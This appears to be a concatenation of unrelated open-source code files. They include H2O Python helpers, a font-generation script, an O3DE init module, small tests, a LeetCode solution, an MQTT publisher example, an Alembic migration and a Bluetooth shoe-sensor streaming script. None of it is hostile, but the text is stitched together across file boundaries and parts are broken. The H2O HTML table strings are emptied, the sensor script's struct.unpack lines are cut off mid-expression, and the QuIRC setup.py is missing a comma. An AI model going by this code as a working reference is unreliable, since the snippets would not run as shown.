column expansion. If FALSE, the indicator column corresponding to the first factor level of every categorical variable will be dropped. Defaults to FALSE. :return: a new dim reduction model """ return h2o_model_builder.unsupervised_model_build(x,validation_x,"pca",kwargs) def svd(x,validation_x=None,**kwargs): """ Singular value decomposition of a H2O dataset using the power method. :param nv: The number of right singular vectors to be computed. This must be between 1 and min(ncol(training_frame), nrow(training_frame)) inclusive. :param max_iterations: The maximum number of iterations to run each power iteration loop. Must be between 1 and 1e6 inclusive.max_iterations The maximum number of iterations to run each power iteration loop. Must be between 1 and 1e6 inclusive. :param transform: A character string that indicates how the training data should be transformed before running PCA. Possible values are "NONE": for no transformation, "DEMEAN": for subtracting the mean of each column, "DESCALE": for dividing by the standard deviation of each column, "STANDARDIZE": for demeaning and descaling, and "NORMALIZE": for demeaning and dividing each column by its range (max - min). :param seed: (Optional) Random seed used to initialize the right singular vectors at the beginning of each power method iteration. :param use_all_factor_levels: (Optional) A logical value indicating whether all factor levels should be included in each categorical column expansion. If FALSE, the indicator column corresponding to the first factor level of every categorical variable will be dropped. Defaults to TRUE. :return: a new dim reduction model """ kwargs['_rest_version'] = 99 return h2o_model_builder.unsupervised_model_build(x,validation_x,"svd",kwargs) def naive_bayes(x,y,validation_x=None,validation_y=None,**kwargs): """ The naive Bayes classifier assumes independence between predictor variables conditional on the response, and a Gaussian distribution of numeric predictors with mean and standard deviation computed from the training dataset. When building a naive Bayes classifier, every row in the training dataset that contains at least one NA will be skipped completely. If the test dataset has missing values, then those predictors are omitted in the probability calculation during prediction. :param laplace: A positive number controlling Laplace smoothing. The default zero disables smoothing. :param threshold: The minimum standard deviation to use for observations without enough data. Must be at least 1e-10. :param eps: A threshold cutoff to deal with numeric instability, must be positive. :param compute_metrics: A logical value indicating whether model metrics should be computed. Set to FALSE to reduce the runtime of the algorithm. :return: Returns an H2OBinomialModel if the response has two categorical levels, H2OMultinomialModel otherwise. """ return h2o_model_builder.supervised_model_build(x,y,validation_x,validation_y,"naivebayes",kwargs) def create_frame(id = None, rows = 10000, cols = 10, randomize = True, value = 0, real_range = 100, categorical_fraction = 0.2, factors = 100, integer_fraction = 0.2, integer_range = 100, binary_fraction = 0.1, binary_ones_fraction = 0.02, missing_fraction = 0.01, response_factors = 2, has_response = False, seed=None): """ Data Frame Creation in H2O. Creates a data frame in H2O with real-valued, categorical, integer, and binary columns specified by the user. :param id: A string indicating the destination key. If empty, this will be auto-generated by H2O. :param rows: The number of rows of data to generate. :param cols: The number of columns of data to generate. Excludes the response column if has_response == True}. :param randomize: A logical value indicating whether data values should be randomly generated. This must be TRUE if either categorical_fraction or integer_fraction is non-zero. :param value: If randomize == FALSE, then all real-valued entries will be set to this value. :param real_range: The range of randomly generated real values. :param categorical_fraction: The fraction of total columns that are categorical. :param factors: The number of (unique) factor levels in each categorical column. :param integer_fraction: The fraction of total columns that are integer-valued. :param integer_range: The range of randomly generated integer values. :param binary_fraction: The fraction of total columns that are binary-valued. :param binary_ones_fraction: The fraction of values in a binary column that are set to 1. :param missing_fraction: The fraction of total entries in the data frame that are set to NA. :param response_factors: If has_response == TRUE, then this is the number of factor levels in the response column. :param has_response: A logical value indicating whether an additional response column should be pre-pended to the final H2O data frame. If set to TRUE, the total number of columns will be cols+1. :param seed: A seed used to generate random values when randomize = TRUE. :return: the H2OFrame that was created """ parms = {"dest": _py_tmp_key() if id is None else id, "rows": rows, "cols": cols, "randomize": randomize, "value": value, "real_range": real_range, "categorical_fraction": categorical_fraction, "factors": factors, "integer_fraction": integer_fraction, "integer_range": integer_range, "binary_fraction": binary_fraction, "binary_ones_fraction": binary_ones_fraction, "missing_fraction": missing_fraction, "response_factors": response_factors, "has_response": has_response, "seed": -1 if seed is None else seed, } H2OJob(H2OConnection.post_json("CreateFrame", **parms), "Create Frame").poll() return get_frame(parms["dest"]) def interaction(data, factors, pairwise, max_factors, min_occurrence, destination_frame=None): """ Categorical Interaction Feature Creation in H2O. Creates a frame in H2O with n-th order interaction features between categorical columns, as specified by the user. :param data: the H2OFrame that holds the target categorical columns. :param factors: factors Factor columns (either indices or column names). :param pairwise: Whether to create pairwise interactions between factors (otherwise create one higher-order interaction). Only applicable if there are 3 or more factors. :param max_factors: Max. number of factor levels in pair-wise interaction terms (if enforced, one extra catch-all factor will be made) :param min_occurrence: Min. occurrence threshold for factor levels in pair-wise interaction terms :param destination_frame: A string indicating the destination key. If empty, this will be auto-generated by H2O. :return: H2OFrame """ data._eager() factors = [data.names()[n] if isinstance(n,int) else n for n in factors] parms = {"dest": _py_tmp_key() if destination_frame is None else destination_frame, "source_frame": data._id, "factor_columns": [_quoted(f) for f in factors], "pairwise": pairwise, "max_factors": max_factors, "min_occurrence": min_occurrence, } H2OJob(H2OConnection.post_json("Interaction", **parms), "Interactions").poll() return get_frame(parms["dest"]) def network_test(): res = H2OConnection.get_json(url_suffix="NetworkTest") res["table"].show() def locate(path): """ Search for a relative path and turn it into an absolute path. This is handy when hunting for data files to be passed into h2o and used by import file. Note: This function is for unit testing purposes only. :param path: Path to search for :return: Absolute path if it is found. None otherwise. """ tmp_dir = os.path.realpath(os.getcwd()) possible_result = os.path.join(tmp_dir, path) while (True): if (os.path.exists(possible_result)): return possible_result next_tmp_dir = os.path.dirname(tmp_dir) if (next_tmp_dir == tmp_dir): raise ValueError("File not found: " + path) tmp_dir = next_tmp_dir possible_result = os.path.join(tmp_dir, path) def store_size(): """ Get the H2O store size (current count of keys). :return: number of keys in H2O cloud """ return rapids("(store_size)")["result"] def keys_leaked(num_keys): """ Ask H2O if any keys leaked. @param num_keys: The number of keys that should be there. :return: A boolean True/False if keys leaked. If keys leaked, check H2O logs for further detail. """ return rapids("keys_leaked #{})".format(num_keys))["result"]=="TRUE" def as_list(data, use_pandas=True): """ Convert an H2O data object into a python-specific object. WARNING: This will pull all data local! If Pandas is available (and use_pandas is True), then pandas will be used to parse the data frame. Otherwise, a list-of-lists populated by character data will be returned (so the types of data will all be str). :param data: An H2O data object. :param use_pandas: Try to use pandas for reading in the data. :return: List of list (Rows x Columns). """ return H2OFrame.as_data_frame(data, use_pandas) def set_timezone(tz): """ Set the Time Zone on the H2O Cloud :param tz: The desired timezone. :return: None """ rapids(ExprNode("setTimeZone", tz)._eager()) def get_timezone(): """ Get the Time Zone on the H2O Cloud :return: the time zone (string) """ return H2OFrame(expr=ExprNode("getTimeZone"))._scalar() def list_timezones(): """ Get a list of all the timezones :return: the time zones (as an H2OFrame) """ return H2OFrame(expr=ExprNode("listTimeZones"))._frame() class H2ODisplay: """ Pretty printing for H2O Objects; Handles both IPython and vanilla console display """ THOUSANDS = "{:,}" def __init__(self,table=None,header=None,table_header=None,**kwargs): self.table_header=table_header self.header=header self.table=table self.kwargs=kwargs self.do_print=True # one-shot display... never return an H2ODisplay object (or try not to) # if holding onto a display object, then may have odd printing behavior # the __repr__ and _repr_html_ methods will try to save you from many prints, # but just be WARNED that your mileage may vary! # # In other words, it's better to just new one of these when you're ready to print out. if self.table_header is not None: print print self.table_header + ":" print if H2ODisplay._in_ipy(): from IPython.display import display display(self) self.do_print=False else: self.pprint() self.do_print=False # for Ipython def _repr_html_(self): if self.do_print: return H2ODisplay._html_table(self.table,self.header) def pprint(self): r = self.__repr__() print r # for python REPL console def __repr__(self): if self.do_print or not H2ODisplay._in_ipy(): if self.header is None: return tabulate.tabulate(self.table,**self.kwargs) else: return tabulate.tabulate(self.table,headers=self.header,**self.kwargs) self.do_print=True return "" @staticmethod def _in_ipy(): # are we in ipy? then pretty print tables with _repr_html try: __IPYTHON__ return True except NameError: return False # some html table builder helper things @staticmethod def _html_table(rows, header=None): table= "
{}
" # keep table in a div for scroll-a-bility table_rows=[] if header is not None: table_rows.append(H2ODisplay._html_row(header)) for row in rows: table_rows.append(H2ODisplay._html_row(row)) return table.format("\n".join(table_rows)) @staticmethod def _html_row(row): res = "{}" entry = "{}" entries = "\n".join([entry.format(str(r)) for r in row]) return res.format(entries) def can_use_pandas(): try: imp.find_module('pandas') return True except ImportError: return False #!/usr/bin/env python2 # -*- coding: utf-8 -*- """ Generates the Comic Mono font files based on Comic Shanns font. Required files: - vendor/comic-shanns.otf - vendor/Cousine-Regular.ttf Based on: - monospacifier: https://github.com/cpitclaudel/monospacifier/blob/master/monospacifier.py - YosemiteAndElCapitanSystemFontPatcher: https://github.com/dtinth/YosemiteAndElCapitanSystemFontPatcher/blob/master/bin/patch """ import os import re import sys import fontforge import psMat import unicodedata def height(font): return float(font.capHeight) def adjust_height(source, template, scale): source.selection.all() source.transform(psMat.scale(height(template) / height(source))) for attr in ['ascent', 'descent', 'hhea_ascent', 'hhea_ascent_add', 'hhea_linegap', 'hhea_descent', 'hhea_descent_add', 'os2_winascent', 'os2_winascent_add', 'os2_windescent', 'os2_windescent_add', 'os2_typoascent', 'os2_typoascent_add', 'os2_typodescent', 'os2_typodescent_add', ]: setattr(source, attr, getattr(template, attr)) source.transform(psMat.scale(scale)) font = fontforge.open('comic-shanns-norwegian.sfd') ref = fontforge.open('vendor/Cousine-Regular.ttf') for g in font.glyphs(): uni = g.unicode category = unicodedata.category(chr(uni)) if 0 <= uni <= sys.maxunicode else None if g.width > 0 and category not in ['Mn', 'Mc', 'Me']: target_width = 510 if g.width != target_width: delta = target_width - g.width g.left_side_bearing += delta / 2 g.right_side_bearing += delta - g.left_side_bearing g.width = target_width font.familyname = 'Comic Mononorsk' font.version = '1.0' font.comment = 'https://github.com/dtinth/comic-mono-font' font.copyright = 'https://github.com/dtinth/comic-mono-font/blob/master/LICENSE' adjust_height(font, ref, 1.075) font.sfnt_names = [] # Get rid of 'Prefered Name' etc. font.fontname = 'ComicMononorsk' font.fullname = 'Comic Mononorsk' font.generate('ComicMononorsk.ttf') font.selection.all() font.fontname = 'ComicMononorsk-Bold' font.fullname = '' font.weight = 'Bold' font.changeWeight(32, "LCG", 0, 0, "squish") font.generate('ComicMononorsk-Bold.ttf') cypherdotXd/o3de # coding:utf-8 #!/usr/bin/python # # Copyright (c) Contributors to the Open 3D Engine Project. # For complete copyright and license terms please see the LICENSE at the root of this distribution. # # SPDX-License-Identifier: Apache-2.0 OR MIT # # # -- This line is 75 characters ------------------------------------------- """azpy.shared.__init__""" import os from azpy.env_bool import env_bool from azpy.constants import ENVAR_DCCSI_GDEBUG from azpy.constants import ENVAR_DCCSI_DEV_MODE # global space _G_DEBUG = env_bool(ENVAR_DCCSI_GDEBUG, False) _DCCSI_DEV_MODE = env_bool(ENVAR_DCCSI_DEV_MODE, False) _PACKAGENAME = __name__ if _PACKAGENAME is '__main__': _PACKAGENAME = 'azpy.shared' import azpy _LOGGER = azpy.initialize_logger(_PACKAGENAME) _LOGGER.debug('Invoking __init__.py for {0}.'.format({_PACKAGENAME})) # ------------------------------------------------------------------------- __all__ = ['common', 'ui'] # ------------------------------------------------------------------------- # ------------------------------------------------------------------------- if _DCCSI_DEV_MODE: # If in dev mode this will test imports of __all__ from azpy import test_imports _LOGGER.debug('Testing Imports from {0}'.format(_PACKAGENAME)) test_imports(__all__, _pkg=_PACKAGENAME, _logger=_LOGGER) # ------------------------------------------------------------------------- del _LOGGER tests/test_makePDF.py import pytest from unittest import TestCase from PIL import Image import sys, os, shutil, uuid myPath = os.path.dirname(os.path.abspath(__file__)) sys.path.insert(0, myPath + "/../src/makePDF/") # move to the src directory import main class TestMakePDF(TestCase): def test_make_pdf_wrong_file(self): with pytest.raises(IOError) as e_info: main.make_pdf_from_images(["/not/here.png"], "foo.pdf") assert e_info == "Something went wrong, I can't access the file at /not/here.png" def test_make_pdf(self): main.make_pdf_from_images( ['tests/images/travis-pride.png', 'tests/images/travis-pride-sans-alpha.png'], output = "out.pdf" )ultrafive/riscv-pvp1-10 from ...isa.inst import * class Rem(Inst): name = 'rem' def golden(self): if self['rs2'] == 0: return self['rs1'] else: d = int( self['rs1'] / self['rs2'] ) return self['rs1'] - d * self['rs2']class Solution: def numberOfWays(self, s: str) -> int: temp = [] c0 = 0 c1 = 0 for char in s : if char == "0" : c0+=1 else: c1+=1 temp.append([c0,c1]) total0 = c0 total1 = c1 count = 0 for i in range(1, len(s)-1) : if s[i] == "0" : m1 = temp[i-1][1] m2 = total1 - temp[i][1] count += m1*m2 else: m1 = temp[i-1][0] m2 = total0 - temp[i][0] count += m1*m2 return count { "targets": [ { "target_name": "example", "sources": [ "src/main.cpp" ], "libraries": [ "../target/debug/libint_add.a" ] } ] } #!/usr/bin/python # -*- coding: utf-8 -*- # Copyright (c) 2017 <> # # All rights reserved. This program and the accompanying materials # are made available under the terms of the Eclipse Distribution License v1.0 # which accompanies this distribution. # # The Eclipse Distribution License is available at # http://www.eclipse.org/org/documents/edl-v10.php. # # All rights reserved. # This shows a example of an MQTT publisher with the ability to use # user name, password CA certificates based on command line arguments import paho.mqtt.client as mqtt import os import ssl import argparse import time parser = argparse.ArgumentParser() parser.add_argument('-H', '--host', required=False, default="mqtt.eclipseprojects.io") parser.add_argument('-t', '--topic', required=False, default="paho/test/opts") parser.add_argument('-q', '--qos', required=False, type=int,default=0) parser.add_argument('-c', '--clientid', required=False, default=None) parser.add_argument('-u', '--username', required=False, default=None) parser.add_argument('-d', '--disable-clean-session', action='store_true', help="disable 'clean session' (sub + msgs not cleared when client disconnects)") parser.add_argument('-p', '--password', required=False, default=None) parser.add_argument('-P', '--port', required=False, type=int, default=None, help='Defaults to 8883 for TLS or 1883 for non-TLS') parser.add_argument('-N', '--nummsgs', required=False, type=int, default=1, help='send this many messages before disconnecting') parser.add_argument('-S', '--delay', required=False, type=float, default=1, help='number of seconds to sleep between msgs') parser.add_argument('-k', '--keepalive', required=False, type=int, default=60) parser.add_argument('-s', '--use-tls', action='store_true') parser.add_argument('--insecure', action='store_true') parser.add_argument('-F', '--cacerts', required=False, default=None) parser.add_argument('--tls-version', required=False, default=None, help='TLS protocol version, can be one of tlsv1.2 tlsv1.1 or tlsv1\n') parser.add_argument('-D', '--debug', action='store_true') args, unknown = parser.parse_known_args() def on_connect(mqttc, obj, flags, rc): print("connect rc: " + str(rc)) def on_message(mqttc, obj, msg): print(msg.topic + " " + str(msg.qos) + " " + str(msg.payload)) def on_publish(mqttc, obj, mid): print("mid: " + str(mid)) def on_subscribe(mqttc, obj, mid, granted_qos): print("Subscribed: " + str(mid) + " " + str(granted_qos)) def on_log(mqttc, obj, level, string): print(string) usetls = args.use_tls if args.cacerts: usetls = True port = args.port if port is None: if usetls: port = 8883 else: port = 1883 mqttc = mqtt.Client(args.clientid,clean_session = not args.disable_clean_session) if usetls: if args.tls_version == "tlsv1.2": tlsVersion = ssl.PROTOCOL_TLSv1_2 elif args.tls_version == "tlsv1.1": tlsVersion = ssl.PROTOCOL_TLSv1_1 elif args.tls_version == "tlsv1": tlsVersion = ssl.PROTOCOL_TLSv1 elif args.tls_version is None: tlsVersion = None else: print ("Unknown TLS version - ignoring") tlsVersion = None if not args.insecure: cert_required = ssl.CERT_REQUIRED else: cert_required = ssl.CERT_NONE mqttc.tls_set(ca_certs=args.cacerts, certfile=None, keyfile=None, cert_reqs=cert_required, tls_version=tlsVersion) if args.insecure: mqttc.tls_insecure_set(True) if args.username or args.password: mqttc.username_pw_set(args.username, args.password) mqttc.on_message = on_message mqttc.on_connect = on_connect mqttc.on_publish = on_publish mqttc.on_subscribe = on_subscribe if args.debug: mqttc.on_log = on_log print("Connecting to "+args.host+" port: "+str(port)) mqttc.connect(args.host, port, args.keepalive) mqttc.loop_start() for x in range (0, args.nummsgs): msg_txt = '{"msgnum": "'+str(x)+'"}' print("Publishing: "+msg_txt) infot = mqttc.publish(args.topic, msg_txt, qos=args.qos) infot.wait_for_publish() time.sleep(args.delay) mqttc.disconnect() RhinosF1/QuIRC from distutils.core import setup setup( name = "QuIRC", py_modules = ["QuIRC"], version = "BetaV1.1", description = "Quick auto-logging IRC Bot", author = "RhinosF1 & Sario528", author_email = "" download_url = "", keywords = ["irc"] ) src/migrations/versions/8ac607623072_.py1-10 """empty message Revision ID: 8ac607623072 Revises: 1b68633 Create Date: 2020-06-16 22:36:47.444458 """ from alembic import op import sqlalchemy as sa # revision identifiers, used by Alembic. revision = '8ac607623072' down_revision = '1b68633c' branch_labels = None depends_on = None def upgrade(): # ### commands auto generated by Alembic - please adjust! ### op.execute("COMMIT") op.execute("ALTER TYPE event ADD VALUE 'ON_MEASUREMENT_PUBLISHED';") # ### end Alembic commands ### def downgrade(): # ### commands auto generated by Alembic - please adjust! ### op.execute("COMMIT") op.execute("ALTER TYPE event DROP VALUE 'ON_MEASUREMENT_PUBLISHED';") # ### end Alembic commands ### victor-abz/saleor1000+ from django.core.management.base import BaseCommand from ...tasks import delete_event_payloads_task class Command(BaseCommand): help = ( "Delete EventPayloads and EventDelivery from database " "that are older than the value set " "in EVENT_PAYLOAD_DELETE_PERIOD environment variable." ) def handle(self, **options): delete_event_payloads_task() #!/usr/bin/env python from __future__ import print_function import argparse from importlib import reload from bluepy.btle import UUID, Peripheral, ADDR_TYPE_RANDOM, Scanner, DefaultDelegate, BTLEException from bluepy import btle import time from time import sleep import struct import binascii import sys import os import datetime import socket import pygame from pygame.locals import * device_to_advertising_data_dictionary = dict() def dump_services(dev): services = sorted(dev.services, key=lambda s: s.hndStart) for s in services: print ("\t%04x: %s" % (s.hndStart, s)) if s.hndStart == s.hndEnd: continue chars = s.getCharacteristics() for i, c in enumerate(chars): props = c.propertiesToString() h = c.getHandle() if 'READ' in props: val = c.read() if c.uuid == btle.AssignedNumbers.device_name: string = '\'' + \ val.decode('utf-8') + '\'' elif c.uuid == btle.AssignedNumbers.device_information: string = repr(val) else: string = '' else: string = '' print ("\t%04x: %-59s %-12s %s" % (h, c, props, string)) while True: h += 1 if h > s.hndEnd or (i < len(chars) - 1 and h >= chars[i + 1].getHandle() - 1): break try: val = dev.readCharacteristic(h) print ("\t%04x: <%s>" % (h, binascii.b2a_hex(val).decode('utf-8'))) except btle.BTLEException: break class ScanPrint(btle.DefaultDelegate): def __init__(self, opts): btle.DefaultDelegate.__init__(self) self.opts = opts def handleDiscovery(self, dev, isNewDev, isNewData): if isNewDev: status = "new" elif isNewData: if self.opts.new: return status = "update" else: if not self.opts.all: return status = "old" if dev.rssi < self.opts.sensitivity: return for (sdid, desc, val) in dev.getScanData(): if sdid in [8, 9]: if "boogio" in val.lower(): print (' Device (%s): %s (%s), %d dBm %s' % (status, dev.addr, dev.addrType, dev.rssi, ('' if dev.connectable else '(not connectable)')) ) for (sdid, desc, val) in dev.getScanData(): #print("desc = " + str(desc) + " val = " + str(val)) if desc == "Manufacturer": device_to_advertising_data_dictionary[str(dev.addr)] = str(val) print("device_to_advertising_data_dictionary[" + str(dev.addr) + "] = " + str(val)) if sdid in [8, 9]: print ('\t' + desc + ': \'' + val + '\'') else: print ('\t' + desc + ': <' + val + '>') class MyDelegate(DefaultDelegate): def __init__(self): self.MAX_FORCE_VALUE = 1023.0 self.MAX_ACCELERATION_VALUE = 8000.0 self.MAX_ROTATION_VALUE = 1000.0 self.MAX_HEADING_VALUE = 1000.0 self.MAX_SHORT_VALUE = 65535.0 self.HALF_OF_MAX_SHORT_VALUE = 32767.0 self.ACCELERATION_CONVERSION_COEFFICIENT = 1.0 / 1000.0 self.ROTATION_CONVERSION_COEFFICIENT = 1.0 / 1000.0 self.force0 = 0.00 self.force1 = 0.00 self.force2 = 0.00 self.force3 = 0.00 self.force4 = 0.00 self.force5 = 0.00 self.force6 = 0.00 self.force7 = 0.00 self.force012 = 0.00 self.force34 = 0.00 self.force567 = 0.00 self.accelerationX = 0.000 self.accelerationY = 0.000 self.accelerationZ = 0.000 self.rotationX = 0.000 self.rotationY = 0.000 self.rotationZ = 0.000 self.rotationW = 0.000 self.buffer1CharacteristicHandle = None def handleNotification(self, hnd, data): #print(data) #print("\n") #Debug print repr(data) if (hnd == self.buffer1CharacteristicHandle): self.accelerationX = struct.unpack(' self.HALF_OF_MAX_SHORT_VALUE): self.accelerationX = self.accelerationX - self.MAX_SHORT_VALUE if(self.accelerationY > self.HALF_OF_MAX_SHORT_VALUE): self.accelerationY = self.accelerationY - self.MAX_SHORT_VALUE if(self.accelerationZ > self.HALF_OF_MAX_SHORT_VALUE): self.accelerationZ = self.accelerationZ - self.MAX_SHORT_VALUE #2's complement if(self.rotationX > self.HALF_OF_MAX_SHORT_VALUE): self.rotationX = self.rotationX - self.MAX_SHORT_VALUE if(self.rotationY > self.HALF_OF_MAX_SHORT_VALUE): self.rotationY = self.rotationY - self.MAX_SHORT_VALUE if(self.rotationZ > self.HALF_OF_MAX_SHORT_VALUE): self.rotationZ = self.rotationZ - self.MAX_SHORT_VALUE if(self.rotationW > self.HALF_OF_MAX_SHORT_VALUE): self.rotationW = self.rotationW - self.MAX_SHORT_VALUE else: teptep = binascii.b2a_hex(data) print('Notification: UNKOWN: hnd {}, data {}'.format(hnd, teptep)) def _str_to_int(self, s): """ Transform hex str into int. """ i = int(s, 16) if i >= 2**7: i -= 2**8 return i def main(): parser = argparse.ArgumentParser() parser.add_argument('-i', '--hci', action='store', type=int, default=0, help='Interface number for scan') parser.add_argument('-t', '--timeout', action='store', type=int, default=4, help='Scan delay, 0 for continuous') parser.add_argument('-s', '--sensitivity', action='store', type=int, default=-128, help='dBm value for filtering far devices') parser.add_argument('-d', '--discover', action='store_true', help='Connect and discover service to scanned devices') parser.add_argument('-a', '--all', action='store_true', help='Display duplicate adv responses, by default show new + updated') parser.add_argument('-n', '--new', action='store_true', help='Display only new adv responses, by default show new + updated') parser.add_argument('-v', '--verbose', action='store_true', help='Increase output verbosity') parser.add_argument('-b', '--bpx', action='store', help='connect to device with this address') parser.add_argument('-p', '--port', action='store', help='relay all readings over this TCP port') parser.add_argument('-e', '--headless', action='store_true', help='run without graphics (improves performance)') arg = parser.parse_args(sys.argv[1:]) #print("arg = " + str(arg)) if arg.bpx != None: print("arg.bpx = " + str(arg.bpx)) PERIPHERAL_UUID = str(arg.bpx) else: PERIPHERAL_UUID = "dc:80:07:ef:8b:cf" #PERIPHERAL_UUID = "f5:47:18:cf:9c:dc" #print("pass the hardware address to this script to connect to that device") #print("usage: -b ") #print("You can find the hardware address by running scanner.py") #return if arg.port != None: TRANSMISSION_PORT = int(arg.port) print("arg.port = " + str(arg.port)) print("TRANSMISSION_PORT = " + str(TRANSMISSION_PORT)) else: TRANSMISSION_PORT = -1 if arg.headless != None: headless = True else: headless = False btle.Debugging = arg.verbose scanner = btle.Scanner(arg.hci).withDelegate(ScanPrint(arg)) print ("Scanning for devices...") devices = scanner.scan(arg.timeout) if arg.discover: print ("Discovering services...") for d in devices: if not d.connectable: continue print (" Connecting to", d.addr + ":") dev = btle.Peripheral(d) dump_services(dev) dev.disconnect() print boogioPeripheral = Peripheral(PERIPHERAL_UUID, "random") boogioDelegate = MyDelegate() boogioPeripheral.setDelegate(boogioDelegate) boogioShoeSensorService = None buffer1Characteristic = None CCCD_UUID = 0x2902 device_is_left_shoe = False device_is_right_shoe = False if device_to_advertising_data_dictionary[str(PERIPHERAL_UUID)] == "ffff05": device_is_right_shoe = True print("Device is Right Shoe") elif device_to_advertising_data_dictionary[str(PERIPHERAL_UUID)] == "ffff04": device_is_left_shoe = True print("Device is Right Shoe") else: print("DEVICE NOT RECOGNIZED!") for svc in boogioPeripheral.services: print(" ") print(str(svc)) if svc.uuid == "f3641400-00B0-4240-ba50-05ca45bf8abc": boogioShoeSensorService = boogioPeripheral.getServiceByUUID(svc.uuid) for characteristic in boogioShoeSensorService.getCharacteristics(): print(characteristic) if characteristic.uuid == "f3641402-00B0-4240-ba50-05ca45bf8abc": buffer1Characteristic = characteristic boogioDelegate.buffer1CharacteristicHandle = characteristic.getHandle() buffer1CCCD = characteristic.getDescriptors(forUUID=CCCD_UUID)[0] buffer1CCCD.write(b"\x01\x00", True) setSampleRateByteString = bytearray() setSampleRateByteString.append(0x04) # set sample rate command setSampleRateByteString.append(0x05) # frequency argument (Hz) buffer1Characteristic.write(setSampleRateByteString, withResponse = True) current_time = int(round(time.time() * 1000)) byteString = bytearray() byteString.append(0x00) #set time command byteString.append((current_time >> 56) & 0xff) byteString.append((current_time >> 48) & 0xff) byteString.append((current_time >> 40) & 0xff) byteString.append((current_time >> 32) & 0xff) byteString.append((current_time >> 24) & 0xff) byteString.append((current_time >> 16) & 0xff) byteString.append((current_time >> 8) & 0xff) byteString.append((current_time >> 0) & 0xff) time.sleep(1) reload(sys) #sys.setdefaultencoding('utf8') # upate timestamp print("Timestamp = " + str(current_time)) #boogioPeripheral.writeCharacteristic(forceCharacteristicHandle, byteString, True) buffer1Characteristic.write(byteString, withResponse = True) #pygame graphics pygame.init() SCREEN_WIDTH = 640 SCREEN_HEIGHT = 400 READING_SCALE = 100 WINDOW_RESOLUTION = (SCREEN_WIDTH, SCREEN_HEIGHT) DISPLAYSURF = pygame.display.set_mode(WINDOW_RESOLUTION, pygame.DOUBLEBUF | pygame.HWSURFACE, 32) pygame.display.set_caption("Boogio 6 Data Streaming Example") metricsFont = pygame.font.SysFont("comicsans", 24) BLACK = (0,0,0) RED = (255,60,120) GREEN = (58,255,118) BLUE = (64,128,255) ORANGE = (252, 97, 38) YELLOW = (255, 255, 15) if TRANSMISSION_PORT > 0: # create a socket object serversocket = socket.socket(socket.AF_INET, socket.SOCK_STREAM) # get local machine name host = '' # bind to the port serversocket.bind((host, TRANSMISSION_PORT)) print("Waiting for tcp socket connection over port " + str(TRANSMISSION_PORT) + "...") # queue up to 5 requests serversocket.listen(5) clientsocket, addr = serversocket.accept() shouldQuit = False while not shouldQuit: for event in pygame.event.get(): if event.type == QUIT: shouldQuit = True elif event.type == KEYDOWN: if event.key == K_ESCAPE: shouldQuit = True boogioPeripheral.waitForNotifications(0) accelerationX = str(round(boogioDelegate.accelerationX, 2)) accelerationY = str(round(boogioDelegate.accelerationY, 2)) accelerationZ = str(round(boogioDelegate.accelerationZ, 2)) rotationX = str(round(boogioDelegate.rotationX, 2)) rotationY = str(round(boogioDelegate.rotationY, 2)) rotationZ = str(round(boogioDelegate.rotationZ, 2)) rotationW = str(round(boogioDelegate.rotationW, 2)) force012String = str(round(boogioDelegate.force012, 2)) force34String = str(round(boogioDelegate.force34, 2)) force567String = str(round(boogioDelegate.force567, 2)) if headless == True: header = "" if device_is_left_shoe: header = header + "ls" elif device_is_right_shoe: header = header + "rs" header = header + "bl" message = header + " " + accelerationX + " " + accelerationY + " " + accelerationZ + " " \ + rotationX + " " + rotationY + " " + rotationZ + " " + rotationW + " " \ + force012String + " " + force34String + " " + force567String print(message) if TRANSMISSION_PORT > 0: try: clientsocket.send(message.encode('ascii')) except (BrokenPipeError): shouldQuit = True else: hSpacing = 13 vSpacing = 24 cursorX = hSpacing cursorY = vSpacing #labels DISPLAYSURF.fill(BLACK) labelSurface = metricsFont.render("Peripheral: ", 1, (255,255,255)) DISPLAYSURF.blit(labelSurface, (cursorX, vSpacing)) labelSurface = metricsFont.render("Acceleration ", 1, (255,255,255)) DISPLAYSURF.blit(labelSurface, (cursorX, vSpacing * 3)) labelSurface = metricsFont.render("[Gravities*1000]:", 1, (255,255,255)) DISPLAYSURF.blit(labelSurface, (cursorX, vSpacing * 4)) labelSurface = metricsFont.render("Rotation ", 1, (255,255,255)) DISPLAYSURF.blit(labelSurface, (cursorX, vSpacing * 6)) labelSurface = metricsFont.render("[quaternion*1000]:", 1, (255,255,255)) DISPLAYSURF.blit(labelSurface, (cursorX, vSpacing * 7)) labelSurface = metricsFont.render("Force ", 1, (255,255,255)) DISPLAYSURF.blit(labelSurface, (cursorX, vSpacing * 10)) labelSurface = metricsFont.render("[ADC]:", 1, (255,255,255)) DISPLAYSURF.blit(labelSurface, (cursorX, vSpacing * 11)) # readings cursorX = SCREEN_WIDTH / 8 labelSurface = metricsFont.render(PERIPHERAL_UUID, 1, (255,255,255)) DISPLAYSURF.blit(labelSurface, (cursorX + hSpacing*8, vSpacing)) labelSurface = metricsFont.render("____________________________________________________________________", 1, (255,255,255)) DISPLAYSURF.blit(labelSurface, (hSpacing, vSpacing * 1)) labelSurface = metricsFont.render("____________________________________________________________________", 1, (255,255,255)) DISPLAYSURF.blit(labelSurface, (hSpacing, vSpacing * 2)) labelSurface = metricsFont.render("X", 1, RED) DISPLAYSURF.blit(labelSurface, (cursorX + hSpacing*8, vSpacing * 2)) labelSurface = metricsFont.render("Y", 1, GREEN) DISPLAYSURF.blit(labelSurface, (cursorX + hSpacing*16, vSpacing * 2)) labelSurface = metricsFont.render("Z", 1, BLUE) DISPLAYSURF.blit(labelSurface, (cursorX + hSpacing*24, vSpacing * 2)) labelSurface = metricsFont.render("W", 1, YELLOW) DISPLAYSURF.blit(labelSurface, (cursorX + hSpacing*32, vSpacing * 2)) labelSurface = metricsFont.render(accelerationX, 1, RED) DISPLAYSURF.blit(labelSurface, (cursorX + hSpacing*8, vSpacing * 4)) labelSurface = metricsFont.render(accelerationY, 1, GREEN) DISPLAYSURF.blit(labelSurface, (cursorX + hSpacing*16, vSpacing * 4)) labelSurface = metricsFont.render(accelerationZ, 1, BLUE) DISPLAYSURF.blit(labelSurface, (cursorX + hSpacing*24, vSpacing * 4)) labelSurface = metricsFont.render(rotationX, 1, RED) DISPLAYSURF.blit(labelSurface, (cursorX + hSpacing*8, vSpacing * 7)) labelSurface = metricsFont.render(rotationY, 1, GREEN) DISPLAYSURF.blit(labelSurface, (cursorX + hSpacing*16, vSpacing * 7)) labelSurface = metricsFont.render(rotationZ, 1, BLUE) DISPLAYSURF.blit(labelSurface, (cursorX + hSpacing*24, vSpacing * 7)) labelSurface = metricsFont.render(rotationW, 1, YELLOW) DISPLAYSURF.blit(labelSurface, (cursorX + hSpacing*32, vSpacing * 7)) labelSurface = metricsFont.render("____________________________________________________________________", 1, (255,255,255)) 